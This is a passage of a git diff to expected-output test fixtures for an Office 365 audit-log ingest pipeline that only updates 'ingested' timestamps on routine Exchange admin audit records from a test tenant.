Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6765,7 +6765,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853424100Z", + "ingested": "2021-12-14T14:49:28.056990478Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6846,7 +6846,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853428800Z", + "ingested": "2021-12-14T14:49:28.056991062Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6927,7 +6927,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853434300Z", + "ingested": "2021-12-14T14:49:28.056991493Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6996,7 +6996,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853439400Z", + "ingested": "2021-12-14T14:49:28.056991982Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7077,7 +7077,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853445200Z", + "ingested": "2021-12-14T14:49:28.056992419Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7145,7 +7145,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853449600Z", + "ingested": "2021-12-14T14:49:28.056992860Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7215,7 +7215,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853454200Z", + "ingested": "2021-12-14T14:49:28.056993338Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7293,7 +7293,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853460100Z", + "ingested": "2021-12-14T14:49:28.056993829Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7374,7 +7374,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853465900Z", + "ingested": "2021-12-14T14:49:28.056994263Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7444,7 +7444,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853471600Z", + "ingested": "2021-12-14T14:49:28.056994710Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7525,7 +7525,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853475500Z", + "ingested": "2021-12-14T14:49:28.056995141Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7608,7 +7608,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853480200Z", + "ingested": "2021-12-14T14:49:28.056995572Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -7689,7 +7689,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853484400Z", + "ingested": "2021-12-14T14:49:28.056996010Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json index 563eacc3772..c043da488ca 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json 
@@ -72,7 +72,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659926900Z", + "ingested": "2021-12-14T14:49:39.335742746Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png 